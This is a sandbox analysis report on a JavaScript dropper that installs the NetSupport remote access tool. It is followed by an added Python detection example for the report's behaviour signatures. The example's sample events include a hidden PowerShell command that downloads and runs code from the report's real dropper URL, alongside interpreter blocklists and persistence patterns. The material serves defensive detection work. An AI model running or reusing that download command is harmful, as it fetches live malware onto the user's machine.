General

  • Target

    updates.js

  • Size

    7.3MB

  • Sample

    240701-3bdy3szdkq

  • MD5

    467b34c64e52ed4607202b5333ef7894

  • SHA1

    76856cf2f7fba65093b3faa20c2204a4b6bb8c51

  • SHA256

    1263960b08d1842b481e0323d80f11dcc076b57cb13663e15a8c732dbcb06139

  • SHA512

    5ecbd268e2e340cca3200bb3d5c6749264ab637a06c89852cf58179320db1a1cb162ceb220f279d38cbb3c0322010ef924fdf4b653d4a50ef56e8c90e2955240

  • SSDEEP

    49152:47h4zjCxb7qHlp4BOlN0KFhcuscyEMzYsm7++86mn3Ef/Vf7GI0/3qp6RCgScEQI:D

Malware Config

Extracted

  • Language

    ps1

  • Source: ps1.dropper

    URLs: http://helpcenter.cyou/help.php?13230

  • Source: exe.dropper

    URLs: http://helpcenter.cyou/help.php?13230

Targets

    • NetSupport

      NetSupport is a remote access tool sold as legitimate system administration software.

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Runs PowerShell with the display window hidden.

    • Checks computer location settings

      Looks up the country code configured in the registry, likely as a geofence check.

    • Executes dropped EXE

    • Loads dropped DLL

    • Adds Run key to start application
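
The signatures above are behaviour labels; the following is an added example, not part of this report or of any sandbox vendor's rule set, that turns each of them into a small predicate and runs it over constructed Sysmon-shaped events so the behaviours can be seen as telemetry. The event field names, every file path, the blocklist of network-capable interpreters and the registry key used for the location lookup are assumptions for illustration; the report supplies only the behaviour names and the dropper URL.

```python
"""
Added example, not part of the sandbox report: encodes the report's behaviour
signatures as predicates and runs them over constructed Sysmon-shaped events.
Field names, file paths, the LOLBin blocklist and the Geo registry key are
assumptions; only the signature names and the dropper URL come from the report.
"""
import re
from urllib.parse import urlparse

# IOC taken from the report's extracted config (ps1.dropper / exe.dropper).
DROPPER_URLS = ["http://helpcenter.cyou/help.php?13230"]
IOC_HOSTS = {urlparse(u).hostname for u in DROPPER_URLS}

# Assumed blocklist: interpreters and LOLBins that normally should not make network requests.
BLOCKLISTED_NET = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                   "mshta.exe", "rundll32.exe", "regsvr32.exe"}
# -w hidden / -WindowStyle Hidden / -w h / -w 1 all hide the PowerShell window.
HIDDEN_WINDOW = re.compile(r"(?i)(?:^|\s)-w(?:indowstyle)?\s+(?:hidden|h|1)\b")
RUN_KEY = re.compile(r"(?i)\\Microsoft\\Windows\\CurrentVersion\\Run(?:Once)?\\")
# Assumed location lookup: the GeoID stored under HKCU\Control Panel\International\Geo.
GEO_KEY = re.compile(r"(?i)\\Control Panel\\International\\Geo\\")
USER_WRITABLE = re.compile(r"(?i)^[a-z]:\\(?:users\\[^\\]+\\|programdata\\|windows\\temp\\)")


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def run_signatures(events):
    """Return {signature_name: [event indices]} for the report's signatures."""
    dropped = set()  # files written to user-writable paths during the run
    hits = {}

    def hit(name, idx):
        hits.setdefault(name, []).append(idx)

    for idx, ev in enumerate(events):
        kind = ev["type"]
        image = basename(ev.get("image", ""))
        if kind == "file":
            if USER_WRITABLE.match(ev["path"]):
                dropped.add(ev["path"].lower())
        elif kind == "process":
            if image in {"powershell.exe", "pwsh.exe"} and HIDDEN_WINDOW.search(ev["cmdline"]):
                hit("Command and Scripting Interpreter: PowerShell", idx)
            if ev["image"].lower() in dropped:
                hit("Executes dropped EXE", idx)
        elif kind == "imageload":
            loaded = ev["path"].lower()
            if loaded in dropped and loaded.endswith(".dll"):
                hit("Loads dropped DLL", idx)
        elif kind == "registry":
            if ev["op"] == "set" and RUN_KEY.search(ev["key"]):
                hit("Adds Run key to start application", idx)
            if ev["op"] == "query" and GEO_KEY.search(ev["key"]):
                hit("Checks computer location settings", idx)
        elif kind == "network":
            if image in BLOCKLISTED_NET:
                hit("Blocklisted process makes network request", idx)
            if ev["dst_host"].lower() in IOC_HOSTS:
                hit("Contacts extracted dropper URL", idx)
    return hits


# Constructed events (hypothetical telemetry, not taken from the report).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
DROPPED_EXE = r"C:\Users\victim\AppData\Roaming\Updater\svc.exe"
DROPPED_DLL = r"C:\Users\victim\AppData\Roaming\Updater\helper.dll"
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\victim\Downloads\updates.js"'},
    {"type": "process", "image": PS,
     "cmdline": 'powershell.exe -w hidden -ep bypass -c "iex (iwr http://helpcenter.cyou/help.php?13230)"'},
    {"type": "network", "image": PS, "dst_host": "helpcenter.cyou", "dst_port": 80},
    {"type": "registry", "op": "query", "image": PS,
     "key": r"HKCU\Control Panel\International\Geo\Nation"},
    {"type": "file", "image": PS, "path": DROPPED_EXE},
    {"type": "file", "image": PS, "path": DROPPED_DLL},
    {"type": "process", "image": DROPPED_EXE, "cmdline": "svc.exe"},
    {"type": "imageload", "image": DROPPED_EXE, "path": DROPPED_DLL},
    {"type": "registry", "op": "set", "image": DROPPED_EXE,
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater", "value": DROPPED_EXE},
    # Benign control: visible interactive PowerShell with no network activity.
    {"type": "process", "image": PS, "cmdline": "powershell.exe Get-Process"},
]

if __name__ == "__main__":
    for name, idxs in run_signatures(SAMPLE_EVENTS).items():
        print(f"{name}: events {idxs}")
```

The "dropped" signatures are stateful: a process or image-load event only counts if an earlier file-write event in the same run produced that path, which is what separates "Executes dropped EXE" from any ordinary process start under a user profile. The hidden-window check is deliberately narrow to PowerShell's own switches; a practitioner extending it would also want `-EncodedCommand` and the `WindowStyle` property of a scheduled task or shortcut, neither of which this report mentions.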

MITRE ATT&CK Enterprise v15

Tasks